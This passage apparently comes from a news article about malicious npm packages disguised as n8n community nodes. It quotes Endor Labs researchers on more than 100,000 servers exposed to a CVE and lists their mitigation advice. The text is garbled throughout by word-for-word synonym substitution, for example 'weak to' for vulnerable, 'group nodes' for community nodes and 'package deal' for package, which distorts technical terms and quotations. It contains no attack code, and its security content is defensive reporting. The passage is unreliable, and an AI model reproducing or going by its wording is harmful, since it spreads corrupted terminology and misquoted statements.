“In keeping with security researchers at information security firm Cyera, there have been greater than 100,000 n8n servers weak to CVE-2026-21858,” Endor researchers stated within the publish. “We have no idea what number of of these set up npm packages as group nodes of their environments. Nonetheless, this quantity exhibits that the n8n ecosystem is lively and thriving.”
Ideas for decreasing dangers
Workflow automation platforms like n8n are extensively adopted for his or her functionality to let groups hyperlink disparate techniques with out hand-coding each integration. However the group node ecosystem relies on npm packages and, due to this fact, inherits related dangers.
To mitigate publicity, Endor Labs researchers beneficial measures resembling preferring built-in integrations over group nodes, auditing package deal metadata and supply code earlier than set up, monitoring outbound community exercise from automation hosts, and utilizing remoted service accounts with restricted privileges wherever attainable. Endor Labs revealed a listing of indicators of compromise (IOCs), together with package deal names, C2 infrastructure, and malicious information, to assist detection efforts. “Regardless that the malicious packages we all know have been disabled in the previous few hours, the assaults might proceed and evolve going ahead,” Plate famous.
